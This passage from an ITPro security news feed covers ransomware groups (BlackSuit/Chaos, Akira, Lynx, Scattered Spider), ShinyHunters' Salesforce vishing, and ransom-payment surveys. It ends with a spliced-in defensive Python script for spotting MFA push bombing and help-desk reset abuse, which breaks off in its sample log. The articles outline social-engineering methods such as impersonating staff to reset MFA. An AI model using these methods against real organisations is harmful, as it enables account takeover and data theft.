According to the Justice Department, on one occasion in 2023 a victim paid a <a href="https://www.itpro.com/strategy/28296/what-is-bitcoin">Bitcoin </a>ransom worth nearly $1.5 million at the time.</p><p>The group used <a href="https://www.itpro.com/security/ransomware/367624/the-rise-of-double-extortion-ransomware">double extortion tactics</a>, encrypting victims’ systems while threatening to leak stolen data to put extra pressure on victims to pay up.</p><h2 id="blacksuit-members-have-already-rebranded">BlackSuit members have already rebranded</h2><p>It appears that at least some of those behind BlackSuit have now reformed as a new ransomware operation called ‘Chaos’.</p><p>Based on the group's encryption methodology, ransom note structure, and the toolset used in the attacks, Cisco Talos reckons <a href="https://blog.talosintelligence.com/new-chaos-ransomware/"><u>the same people are at work</u></a>.</p><p>"Talos assesses with moderate confidence that the new Chaos ransomware group is either a rebranding of the BlackSuit (Royal) ransomware or operated by some of its former members," the firm said in an advisory.</p><p>"This assessment is based on the similarities in TTPs, including encryption commands, the theme and structure of the ransom note, and the use of LOLbins and RMM tools in their attacks." 
</p><p>The group's new <a href="https://www.itpro.com/security/29241/what-are-the-different-types-of-ransomware">Ransomware as a Service (RaaS)</a> operation has already been linked to double extortion attacks, with <a href="https://www.itpro.com/security/phishing/why-social-engineering-is-such-a-problem-and-how-your-business-can-protect-itself">voice-based social engineering</a> the initial access technique, and the use of an encryptor that targets both local and remote storage.</p><p>While law enforcement takedowns are welcomed by enterprises and security practitioners alike, there have been a number of occasions where groups simply regroup and rebrand in the aftermath. </p><p>In 2020, for example, an international operation to <a href="https://www.itpro.com/security/ransomware/357399/microsoft-neutralizes-infamous-ransomware-distributor-ahead-of-the">take down the Trickbot botnet</a> was hailed as a major victory for law enforcement. Yet within less than a year it had returned - and with a more potent strain that enabled threat actors to establish greater persistence on networks. </p><p>The <a href="https://www.itpro.com/security/malware/358450/europol-takes-down-dangerous-emotet-botnet">Emotet takedown</a>, meanwhile, also proved temporary. The Europol-led sting in January 2021 appeared to have crippled the operation, but once again it returned within the space of a year. </p><p>Security experts at the time questioned whether the botnet would be shuttered for good. Analysis in November 2021 showed the <a href="https://www.itpro.com/security/malware/361551/emotet-returns-spreading-quickly-help-of-trickbot">group's infrastructure had doubled</a> since making a comeback.</p><p>“Disrupting ransomware infrastructure is not only about taking down servers — it's about dismantling the entire ecosystem that enables cybercriminals to operate with impunity,” said Michael Prado, deputy assistant director for HSI’s Cyber Crimes Center. 
</p><p>“This operation is the result of tireless international coordination and shows our collective resolve to hold ransomware actors accountable.”</p><h3 class="article-body__section" id="section-more-from-itpro"><span>MORE FROM ITPRO</span></h3><ul><li><a href="https://www.itpro.com/security/ransomware/aeza-group-ransomware-hosting-us-sanctions">A major ransomware hosting provider just got hit with US sanctions</a></li><li><a href="https://www.itpro.com/security/ransomware/new-ransomware-groups-worrying-security-researchers">The ransomware groups worrying security researchers in 2025</a></li><li><a href="https://www.itpro.com/security/ransomware/ransomware-victims-are-getting-better-at-haggling-with-hackers">Ransomware victims are getting better at haggling with hackers</a></li></ul>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ MSPs beware – these two ransomware groups are ramping up attacks and have claimed hundreds of victims ]]></title>
                                                                                                                                                                                                <link>https://www.itpro.com/security/ransomware/msps-beware-these-two-ransomware-groups-are-ramping-up-attacks-and-have-claimed-hundreds-of-victims</link>
                                                                            <description>
                            <![CDATA[ The Akira and Lynx ransomware groups are focusing on small businesses and MSPs using stolen or purchased admin credentials ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">iYKGuHwcAdM99gzoZEaQbB</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/YDWujEWW55Zc2hfESYZWb4-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Tue, 12 Aug 2025 10:30:25 +0000</pubDate>                                                                                                                                <updated>Tue, 12 Aug 2025 19:34:37 +0000</updated>
                                                                                                                                            <category><![CDATA[Ransomware]]></category>
                                                    <category><![CDATA[Security]]></category>
                                                                                                                    <dc:creator><![CDATA[ Emma Woollacott ]]></dc:creator>                                                                <dc:description><![CDATA[ https://cdn.mos.cms.futurecdn.net/aWfskavxoVSMDy6cDWtYmJ.jpg ]]></dc:description>
                                                                                                                                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/YDWujEWW55Zc2hfESYZWb4-1280-80.jpg">
                                                            <media:credit><![CDATA[Getty Images]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Ransomware concept image showing computer screen with binary code, with a skull imprinted over code.]]></media:description>                                                            <media:text><![CDATA[Ransomware concept image showing computer screen with binary code, with a skull imprinted over code.]]></media:text>
                                <media:title type="plain"><![CDATA[Ransomware concept image showing computer screen with binary code, with a skull imprinted over code.]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/YDWujEWW55Zc2hfESYZWb4-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p><a href="https://www.itpro.com/business-operations/31711/what-is-a-managed-it-service">Managed service providers (MSPs)</a> have been warned to remain vigilant amidst an uptick in attacks by the Akira and Lynx ransomware groups. </p><p><a href="https://www.acronis.com/en-us/tru/posts/msps-a-top-target-for-akira-and-lynx-ransomware/" target="_blank"><u>Analysis from Acronis</u></a> shows both groups have upped their game in recent months with improvements to their <a href="https://www.itpro.com/security/29241/what-are-the-different-types-of-ransomware">Ransomware as a Service (RaaS)</a> strategies. </p><p>The two groups share a <a href="https://www.itpro.com/security/ransomware/361250/how-not-to-get-hit-by-ransomware-in-2022">RaaS</a> model and <a href="https://www.itpro.com/security/ransomware/367624/the-rise-of-double-extortion-ransomware">double extortion</a> tactics. Lynx, for example, is believed to incorporate elements of the leaked LockBit source code, while Akira shares similarities with Conti, suggesting a shared codebase heritage. </p><p>Both groups gain initial access through stolen credentials and VPN vulnerabilities, then follow up with reconnaissance, privilege escalation, defense evasion, and data exfiltration and encryption, according to Acronis.</p><p>They tend to target small and medium-sized businesses, disabling security software, deleting shadow copies, and clearing event logs to avoid detection and hinder recovery.</p><p>Now, researchers at the Acronis Threat Research Unit (TRU) have warned the duo appear to be focusing much of their attention on MSPs.
</p><h2 id="what-you-need-to-know-about-akira-and-lynx">What you need to know about Akira and Lynx</h2><p>Akira has attacked more than 220 victims, including MSPs Hitachi Vantara and Toppan Next Tech, as well as many other small businesses such as law firms, accounting firms, and construction companies.</p><p>Last year, the group was mostly targeting user VPNs by exploiting various vulnerabilities, including the SonicWall firewall flaw CVE-2024-40766, which allowed attackers to disable firewalls and connect to infrastructure.</p><p>This year, Akira operators have been observed using stolen or purchased admin credentials to attempt to gain access to machines and servers. </p><p>If this works, they disable security software; when it doesn't, they launch remote exfiltration and then encryption using legitimate tools that are often whitelisted and not scanned or monitored.</p><p>After obtaining access, attackers performed additional information gathering, lateral movement and detonation of the encryptor.</p><p>Lynx, meanwhile, has hit around 145 victims, again mostly small businesses. First spotted in mid-2024, Lynx shares many similarities with INC ransomware. </p><p>Acronis said Lynx, which operates as a RaaS group, constantly recruits affiliates, posting on Russian underground forums. </p><p>"While not all victims are MSPs, these gangs don’t discriminate when it comes to targets. They’re ready to strike any organization that promises a decent payout," said Acronis.
</p><p>"That said, MSPs stand out as prime targets for cyber criminals because they provide access to a network of other customers, amplifying the potential reward."</p><p>Lynx typically uses phishing emails to deliver its <a href="https://www.itpro.com/malware/28076/what-is-malware">malware </a>to victims, after which the attackers gather system and infrastructure information, attempt to obtain user credentials, and perform lateral movement to infect more computers in the network. </p><p>Recent attacks show that if security software is found, Lynx will try to uninstall it, exfiltrating files to its servers before detonating the encryptor. </p><p>Dray Agha, senior manager of security operations at Huntress, said enterprises of all sizes should be wary of both groups due to their high level of technical proficiency. </p><p>"<a href="https://www.itpro.com/security/28084/what-is-ransomware">Ransomware </a>groups like Akira and Lynx are relentlessly refining their attacks, specifically targeting the resource-constrained SMB sector with increasingly efficient, recycled tactics like credential theft and various attacks against VPNs," Agha commented.</p><p>"The findings underscore the critical need for all businesses, especially SMBs and MSPs, to rigorously enforce fundamental defences," he added. </p><p>This includes bolstering multi-factor authentication (MFA), patching VPNs and "other external-facing systems", as well as "robust, tested backups".
</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Google cyber researchers were tracking the ShinyHunters group’s Salesforce attacks – then realized they’d also fallen victim ]]></title>
                                                                                                                                                                                                <link>https://www.itpro.com/security/cyber-attacks/google-cyber-researchers-were-tracking-the-shinyhunters-groups-salesforce-attacks-then-realized-theyd-fallen-victim</link>
                                                                            <description>
                            <![CDATA[ In an update to an investigation on the ShinyHunters group, Google revealed it had also been affected ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">PsyEru2dq69wS89exzDHEB</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/RZ7UvjBTtZr8WMgy6yjh96-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Thu, 07 Aug 2025 08:34:13 +0000</pubDate>                                                                                                                                <updated>Thu, 07 Aug 2025 08:43:48 +0000</updated>
                                                                                                                                            <category><![CDATA[Cyber Attacks]]></category>
                                                    <category><![CDATA[Security]]></category>
                                                                                                <author><![CDATA[ ross.kelly@futurenet.com (Ross Kelly) ]]></author>                    <dc:creator><![CDATA[ Ross Kelly ]]></dc:creator>                                                                <dc:description><![CDATA[ https://cdn.mos.cms.futurecdn.net/Y5vrV2V98Np6jHAGmAtCd3.jpg ]]></dc:description>
                                                                                                                                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/RZ7UvjBTtZr8WMgy6yjh96-1280-80.jpg">
                                                            <media:credit><![CDATA[Getty Images]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Google logo pictured above the entrance to the company&#039;s King&#039;s Cross office in London, UK. ]]></media:description>                                                            <media:text><![CDATA[Google logo pictured above the entrance to the company&#039;s King&#039;s Cross office in London, UK. ]]></media:text>
                                <media:title type="plain"><![CDATA[Google logo pictured above the entrance to the company&#039;s King&#039;s Cross office in London, UK. ]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/RZ7UvjBTtZr8WMgy6yjh96-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>Google has revealed customer data was exposed following a breach of a Salesforce database. </p><p>An <a href="https://cloud.google.com/blog/topics/threat-intelligence/voice-phishing-data-extortion?rev=7194ef805fa2d04b0f7e8c9521f97343" target="_blank"><u>investigation </u></a>by the Google Threat Intelligence Group (GTIG) found the database, which is used to store information pertaining to small business customers, was targeted by the ShinyHunters cyber criminal group.</p><p>“Analysis revealed that data was retrieved by the threat actor during a small window of time before the access was cut off,” Google said. </p><p>“The data retrieved by the threat actor was confined to basic and largely publicly available business information, such as business names and contact details."</p><p>While no details on the scale of the breach were disclosed by Google, <em>ITPro </em>has approached the company for clarification. </p><p>The admission came in the wake of an investigation into the tactics, techniques, and procedures (TTPs) of the ShinyHunters group, also known as UNC6040. </p><p>According to Google, the <a href="https://www.itpro.com/security/28084/what-is-ransomware">ransomware </a>gang frequently targets enterprise Salesforce databases – albeit not through brute force or capitalizing on flaws, but by using <a href="https://www.itpro.com/security/phishing/why-social-engineering-is-such-a-problem-and-how-your-business-can-protect-itself">social engineering</a> techniques such as <a href="https://www.itpro.com/security/29093/what-is-phishing">phishing </a>or <a href="https://www.itpro.com/security/phishing/358371/fbi-warns-of-ongoing-corporate-vishing-attacks">vishing</a>. </p><p>“A prevalent tactic in UNC6040's operations involves deceiving victims into authorizing a malicious connected app to their organization's Salesforce portal,” the firm explained.
</p><p>“This application is often a modified version of Salesforce’s Data Loader, not authorized by Salesforce,” the blog post added. </p><p>“During a vishing call, the actor guides the victim to visit Salesforce's connected app setup page to approve a version of the Data Loader app with a name or branding that differs from the legitimate version.”</p><p>Upon gaining access to impacted databases, the threat group is able to access, query, and exfiltrate sensitive information directly from customer environments, the blog post noted. </p><p>“This methodology of abusing Data Loader functionalities via malicious connected apps is consistent with recent observations detailed by Salesforce in their guidance on protecting Salesforce environments from such threats,” Google said.</p><h2 id="google-is-the-latest-to-encounter-shinyhunters">Google is the latest to encounter ShinyHunters</h2><p>The ShinyHunters threat group has been around for some time, having claimed a number of high-profile victims in recent years. In May 2024, the ransomware outfit <a href="https://www.itpro.com/security/data-breaches/banking-details-of-30-million-santander-customers-exposed-during-breach-allegedly-up-for-sale-on-the-dark-web"><u>claimed responsibility for a breach at Santander</u></a> which affected millions of customers globally. </p><p>At the time, the group said it gained access to a tranche of financial data belonging to around 30 million customers, including credit card details, which was listed on its dark web site. </p><p>That incident occurred around the same time as a <a href="https://www.itpro.com/security/data-breaches/ticketmaster-hackers-could-have-exploited-aws-instances-to-gain-access-to-half-a-billion-customers-records"><u>major breach at Ticketmaster which affected over 560 million customers</u></a> worldwide. Once again, the group listed a 1.3TB database for sale on BreachForums. 
</p><p>Google’s recent investigation into the ransomware group showed it is once again ramping up activities.</p><p>“We believe threat actors using the 'ShinyHunters' brand may be preparing to escalate their extortion tactics by launching a data leak site (DLS),” the company stated in its blog post. </p><p>“We continue to monitor this actor and will provide updates as appropriate.”</p><p>William Wright, CEO of Closed Door Security, echoed the warning from Google, noting that organisations should take immediate action to shore up Salesforce database protections. </p><p>“ShinyHunters has recently executed a huge volume of attacks via Salesforce and it is essential organizations take note of these. The threat actors have also claimed many attacks are still unreported, so we can expect more victims to be announced in coming weeks," he said. </p><p>“In the wake of these attacks, organizations are recommended to take steps to secure their Salesforce databases,” Wright added. </p><p>“This can be achieved by teaching employees about this attack trend, ensuring <a href="https://www.itpro.com/security/cyber-attacks/how-hackers-bypass-mfa-and-what-to-do-about-it">MFA </a>is applied to all employee and enterprise accounts, and limiting employee access to the minimum level of privileges they require.”</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Nearly one-third of ransomware victims are hit multiple times, even after paying hackers ]]></title>
                                                                                                                                                                                                <link>https://www.itpro.com/security/ransomware/nearly-one-third-of-ransomware-victims-are-hit-multiple-times-even-after-paying-up-to-hackers</link>
                                                                            <description>
                            <![CDATA[ Many ransomware victims are being hit more than once, largely thanks to fragmented security tactics ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">2up8JpF5uyEG7pPZdQW5PF</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/bBfHCREVCzyehuRCbKWheD-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Wed, 06 Aug 2025 11:03:09 +0000</pubDate>                                                                                                                                <updated>Wed, 06 Aug 2025 11:53:05 +0000</updated>
                                                                                                                                            <category><![CDATA[Ransomware]]></category>
                                                    <category><![CDATA[Security]]></category>
                                                                                                                    <dc:creator><![CDATA[ Emma Woollacott ]]></dc:creator>                                                                <dc:description><![CDATA[ https://cdn.mos.cms.futurecdn.net/aWfskavxoVSMDy6cDWtYmJ.jpg ]]></dc:description>
                                                                                                                                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/bBfHCREVCzyehuRCbKWheD-1280-80.jpg">
                                                            <media:credit><![CDATA[Getty Images]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Ransomware concept image showing digitized padlock pictured on a laptop screen on red background]]></media:description>                                                            <media:text><![CDATA[Ransomware concept image showing digitized padlock pictured on a laptop screen on red background]]></media:text>
                                <media:title type="plain"><![CDATA[Ransomware concept image showing digitized padlock pictured on a laptop screen on red background]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/bBfHCREVCzyehuRCbKWheD-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>More than three-in-ten <a href="https://www.itpro.com/security/28084/what-is-ransomware">ransomware </a>victims are being <a href="https://www.itpro.com/security/ransomware/368795/three-ransomware-attacks-hit-single-company-over-two-weeks">hit multiple times</a>, thanks to ineffective defenses and security fragmentation.</p><p>According to Barracuda Networks' <a href="https://www.barracuda.com/reports/the-ransomware-insights-report-2025"><u><em>Ransomware Insights Report</em></u></a>, 57% of organizations fell victim to a successful ransomware attack in the last 12 months, with 31% of victims affected more than once.</p><p>A ransom was paid in 32% of cases, rising to 37% among organizations affected twice or more. More than two-in-ten said they'd experienced pressure to make payments through threats to partners, shareholders, and customers, and 16% reported threats to employees. </p><p>However, 41% of those who paid a ransom failed to recover all their data, the study noted. <a href="https://www.itpro.com/security/ransomware/alphv-leak-site-seized-by-law-enforcement-as-decryption-tool-released">Decryption tools</a> provided by the attackers don't always work, or only a partial key may be provided. </p><p>Meanwhile, files can be damaged during the encryption and decryption processes - or, sometimes, the ransom is paid but decryption tools aren't supplied.</p><p>Many ransomware victims lack basic security, with only 47% using an <a href="https://www.itpro.com/security/phishing/the-state-of-email-security-2023">email security</a> solution, for example, compared with 59% of non-victims. More than seven-in-ten organizations that suffered an email breach were also hit with ransomware. </p><p>“The findings make it clear that ransomware is an escalating threat, and fragmented security defenses leave organizations immensely vulnerable,” said Neal Bradbury, chief product officer at Barracuda. 
</p><p>“Too many victims are juggling an unmanageable number of disconnected tools, often introduced with the best intentions to strengthen protection. Tools that can’t work together, or which are not configured correctly, create security gaps and lead to breaches."</p><p>Just under a quarter of the ransomware incidents reported involved data encryption, while 27% saw the attackers stealing and publishing data. Hackers infected devices with other malicious payloads in 29% of cases, and installed backdoors for persistence in 21%. </p><h2 id="ransomware-attacks-are-getting-worse">Ransomware attacks are getting worse</h2><p>The impact of a successful ransomware attack is also growing. Around four-in-ten victims said they'd suffered from reputational harm, with a quarter reporting tangible business impact and a similar number saying they'd lost new business opportunities.</p><p>Similarly, around a quarter of the ransomware incidents reported involved the encryption of data, locking endpoints and data theft. </p><p>Attacks also featured lateral movement across the network, the infection of multiple endpoints, the installation of additional malicious payloads, privilege elevation, and embedding backdoors and other persistence mechanisms. 
</p><p>To make it harder for victims to restore their data without paying, around one in five attackers accessed and wiped backups and deleted shadow copies of files.</p><p>“In many cases attackers can move through victims’ networks, gaining access to devices, data and more without being detected and blocked," said Bradbury.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ 75% of UK business leaders are willing to risk criminal penalties to pay ransoms ]]></title>
                                                                                                                                                                                                <link>https://www.itpro.com/security/ransomware/75-percent-of-uk-business-leaders-are-willing-to-risk-criminal-penalties-to-pay-ransoms</link>
                                                                            <description>
                            <![CDATA[ A ransom payment ban is a great idea - until you're the one being targeted... ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">GABuJs7zEFaxkHGcZJmRo4</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/hm7qyYp9PbhjVaXbk3hMkE-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Mon, 04 Aug 2025 09:55:03 +0000</pubDate>                                                                                                                                <updated>Mon, 04 Aug 2025 10:19:40 +0000</updated>
                                                                                                                                            <category><![CDATA[Ransomware]]></category>
                                                    <category><![CDATA[Security]]></category>
                                                                                                                    <dc:creator><![CDATA[ Emma Woollacott ]]></dc:creator>                                                                <dc:description><![CDATA[ https://cdn.mos.cms.futurecdn.net/aWfskavxoVSMDy6cDWtYmJ.jpg ]]></dc:description>
                                                                                                                                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/hm7qyYp9PbhjVaXbk3hMkE-1280-80.jpg">
                                                            <media:credit><![CDATA[Getty Images]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Ransomware criminal concept image showing hacker in a hooded top working on a laptop in a dark room.]]></media:description>                                                            <media:text><![CDATA[Ransomware criminal concept image showing hacker in a hooded top working on a laptop in a dark room.]]></media:text>
                                <media:title type="plain"><![CDATA[Ransomware criminal concept image showing hacker in a hooded top working on a laptop in a dark room.]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/hm7qyYp9PbhjVaXbk3hMkE-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>UK business leaders are overwhelmingly in favor of a <a href="https://www.itpro.com/security/ransomware/can-the-uk-ban-ransomware-payments">ban on ransomware payments</a> in the private sector - but would break such a ban themselves if they thought it was necessary.</p><p>The government is proposing a ban on the payment of ransoms by <a href="https://www.itpro.com/business/public-sector">public sector</a> bodies and operators of critical national infrastructure, including the NHS, local councils, and schools. </p><p>For the time being, the ban doesn’t extend to private firms. However, analysis from Commvault found that 96% of UK business leaders believe payments should be banned across both the public and private sectors. </p><p>In the event of a ban being imposed on private sector firms, three-quarters (75%) admitted they would still <a href="https://www.itpro.com/security/ransomware/369506/ransomware-why-do-businesses-still-pay-up">pay a ransom</a> themselves if it were the only way to save their organization, regardless of whether civil or criminal penalties applied. </p><p>“Paying a ransom rarely guarantees recovery and often increases the likelihood of being targeted again,” said Darren Thomson, field CTO EMEAI at Commvault. </p><p>“A well-enforced ban could help take the profit out of ransomware, but it must be matched by greater investment in prevention, detection, and recovery-testing. Without that, more organizations could find themselves exposed at the worst possible moment, with no viable path to recovery.” </p><p>The survey found that 94% of business leaders support limiting ransom payments for public bodies, and 99% for private organizations. </p><p>However, in real-world situations within the private sector, only 10% said they would actually comply with any ban if they were attacked. A further 15% said they'd be neither likely nor unlikely to comply.
</p><p>Of those who supported a proposed payment ban, 34% reckoned it would lead to increased government support and intervention to help build up <a href="https://www.itpro.com/business/policy-and-legislation/what-is-the-eus-cyber-resilience-act-cra">cyber resilience</a>. </p><p>Another third thought it would bring down the number of attacks by reducing the incentive for attackers.</p><h2 id="ransom-payment-bans-are-a-tightrope-for-private-firms">Ransom payment bans are a tightrope for private firms</h2><p>While the government's proposals so far only ban the payment of ransoms by public sector bodies and operators of critical national infrastructure, they do place certain constraints on private firms.</p><p>Businesses would be required to notify the government of any intent to pay a ransom - which would then tell them whether or not they'd be breaking the law by sending money to sanctioned cyber criminal groups, many of which are based in Russia. </p><p>“<a href="https://www.itpro.com/security/28084/what-is-ransomware">Ransomware</a> and cyber attacks will be a concern for a long time, as international cyber gangs make huge profits from them and use these resources to continually develop their attack tools," says Jane Frankland, CEO of security training firm Knewstart.</p><h3 class="article-body__section" id="section-more-from-itpro"><span>MORE FROM ITPRO</span></h3><ul><li><a href="https://www.itpro.com/security/ransomware/new-ransomware-groups-worrying-security-researchers">The ransomware groups worrying security researchers in 2025</a></li><li><a href="https://www.itpro.com/security/ransomware/nearly-half-of-msps-admit-to-having-a-ransomware-kitty">Nearly half of MSPs admit to having a ransomware kitty</a></li><li><a href="https://www.itpro.com/security/ransomware/ransomware-victims-are-getting-better-at-haggling-with-hackers">Ransomware victims are getting better at haggling with hackers</a></li></ul>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ The Scattered Spider ransomware group is infiltrating Slack and Microsoft Teams to target vulnerable employees ]]></title>
                                                                                                                                                                                                <link>https://www.itpro.com/security/ransomware/the-scattered-spider-ransomware-group-is-infiltrating-slack-and-microsoft-teams-to-target-vulnerable-employees</link>
                                                                            <description>
                            <![CDATA[ The group is using new ransomware variants and new social engineering techniques - including sneaking into corporate teleconferences ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">TLzbaEokr9d7yfzVE4c5fP</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/QagRwe2HUXfJ8yFu2Q7UQD-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Wed, 30 Jul 2025 11:30:57 +0000</pubDate>                                                                                                                                <updated>Wed, 30 Jul 2025 11:31:15 +0000</updated>
                                                                                                                                            <category><![CDATA[Ransomware]]></category>
                                                    <category><![CDATA[Security]]></category>
                                                                                                                    <dc:creator><![CDATA[ Emma Woollacott ]]></dc:creator>                                                                <dc:description><![CDATA[ https://cdn.mos.cms.futurecdn.net/aWfskavxoVSMDy6cDWtYmJ.jpg ]]></dc:description>
                                                                                                                                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/QagRwe2HUXfJ8yFu2Q7UQD-1280-80.jpg">
                                                            <media:credit><![CDATA[Getty Images]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Scattered Spider cyber crime group concept image showing a robotic spider climbing up a web with glowing digital data points. ]]></media:description>                                                            <media:text><![CDATA[Scattered Spider cyber crime group concept image showing a robotic spider climbing up a web with glowing digital data points. ]]></media:text>
                                <media:title type="plain"><![CDATA[Scattered Spider cyber crime group concept image showing a robotic spider climbing up a web with glowing digital data points. ]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/QagRwe2HUXfJ8yFu2Q7UQD-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>The Scattered Spider hacking group is on the move again, security agencies have warned, adding new <a href="https://www.itpro.com/security/28084/what-is-ransomware">ransomware</a> and improved <a href="https://www.itpro.com/security/phishing/why-social-engineering-is-such-a-problem-and-how-your-business-can-protect-itself">social engineering</a> techniques to its repertoire.</p>
<p>In a joint international <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-320a" target="_blank"><u>advisory</u></a>, the FBI and other cybersecurity agencies said the group is now deploying DragonForce ransomware and other new variants, and is abusing legitimate remote access tools such as AnyDesk so that its activity blends in with routine administration and is less likely to trigger security alerts.</p>
<p>The group has also started using a new social engineering technique, the advisory warned. While the group has been observed <a href="https://www.itpro.com/security/this-hacker-group-is-posing-as-it-helpdesk-workers-to-target-enterprises-and-researchers-warn-its-social-engineering-techniques-are-exceptionally-hard-to-spot">posing as IT help desk workers</a> to target employees, it is now doing the reverse: impersonating employees and asking IT teams to reset their passwords or transfer their MFA tokens, which hands the attackers both factors at once.</p>
<p>This technique is used by the group to perform account takeovers in single sign-on (SSO) environments, the FBI noted. A reset at the identity provider unlocks every application federated behind it.</p>
<p>Similarly, the group is also conducting ‘push bombing’ - sending the user MFA push prompts over and over until one is finally accepted, out of fatigue or by mistake - and SIM swapping attacks, which let it intercept text messages containing one-time passwords.</p>
<p>Scattered Spider has also been spotted targeting corporate Snowflake accounts for initial network access and data theft.</p>
<p>Nick Tausek, lead security automation architect at Swimlane, said the new techniques employed by the ransomware outfit should “raise a lot of red flags” and urged enterprises to remain vigilant.</p>
<p>"Access to an organization’s Snowflake allows the group to run thousands of queries immediately and simultaneously, often deploying DragonForce malware to encrypt target organizations’ servers," he explained.</p>
<p>"The potential for vast amounts of stolen data explains why they’ve been successful across multiple industries, from insurance to transportation to retail."</p>
<h2 id="scattered-spider-is-infiltrating-teams-and-slack">Scattered Spider is infiltrating Teams and Slack</h2>
<p>Notably, the FBI advisory warned that Scattered Spider has also been infiltrating workplace collaboration platforms such as Slack and Microsoft Teams to gather information, which is then used in <a href="https://www.itpro.com/security/29093/what-is-phishing">phishing</a> attacks against employees.</p>
<p>Microsoft Exchange email accounts are also a top target for the group, agencies noted.</p>
<p>Reconnaissance on employees involves extensive research of a company's website to gather information and “determine the individual’s role in a target organization”.</p>
<p>"These social engineering attempts are enriched by access to personal information derived from social media, open source information, commercial intelligence tools, and database leaks," the advisory added.</p>
<p>The hackers have even created fake identities and joined company teleconferences, including incident remediation and response calls, to learn how the victim is responding. That is one reason incident response should be coordinated over a channel separate from the environment under investigation: an intruder with a foothold in Teams or Slack is already in the room.</p>
<p>"Entering incident remediation and response calls undetected in order to identify how security teams are adapting to their attacks is a clever strategy to remain ahead," Tausek said.</p>
<p>"Listening in on these calls gives them access to information like how they’re being hunted, and what adjustments security teams will make to prevent future attacks."</p>
<h2 id="scattered-spider-has-been-on-a-rampage">Scattered Spider has been on a rampage</h2>
<p>Scattered Spider is believed to have been responsible for a large wave of attacks in recent months, with victims including British retailers and insurance firms.</p>
<p>More recently, threat intelligence reports have suggested the group has <a href="https://www.itpro.com/security/cyber-attacks/scattered-spider-airline-industry-attacks">turned its attention to the airline industry</a>, which represents a lucrative source of potential victims.</p>
<p>Most victims have been in the UK and US, among them <a href="https://www.itpro.com/security/cyber-attacks/m-and-s-aims-for-full-online-restoration-within-four-weeks-following-major-cyber-attack">Marks & Spencer (M&S)</a>, the Co-op, and <a href="https://www.itpro.com/security/cyber-attacks/harrods-cyber-attack">Harrods</a>.</p>
<p>The agencies advise organizations to monitor for unauthorized account activity and for 'risky logins', sign-in attempts that the identity provider has flagged as suspicious.</p>
<p>They should also maintain offline backups of sensitive data, stored separately from the source systems, so that an intruder who reaches production cannot encrypt the copies as well. Similarly, they should enforce phishing-resistant multifactor authentication (MFA), which removes both the push prompt that push bombing relies on and the SMS code that SIM swapping intercepts, and implement application controls to restrict which software can execute.</p>
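<p>As an added example (not part of the advisory or of this article), the following Python script looks for two of the patterns described above in identity-provider sign-in events: an MFA push that is finally approved after a burst of rejections, and a help-desk MFA reset followed by a sign-in from a device the user has never used before. The event format, the field names, the per-user device baseline and the thresholds are all assumptions made for the example, and the sample log is constructed; map them onto your own identity provider's export (Okta System Log, Entra sign-in logs and the like carry equivalent fields) before relying on the logic.</p>

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of identity-provider events (not real log data), one per line:
#   timestamp  user  event  outcome  client
# "client" is the device the attempt came from; "helpdesk" marks an
# administrative action performed on the user's behalf. Assumed format.
SAMPLE_LOG = """\
2025-07-29T09:00:01Z alice mfa_push timeout unknown-q4
2025-07-29T09:00:40Z alice mfa_push denied unknown-q4
2025-07-29T09:01:15Z alice mfa_push denied unknown-q4
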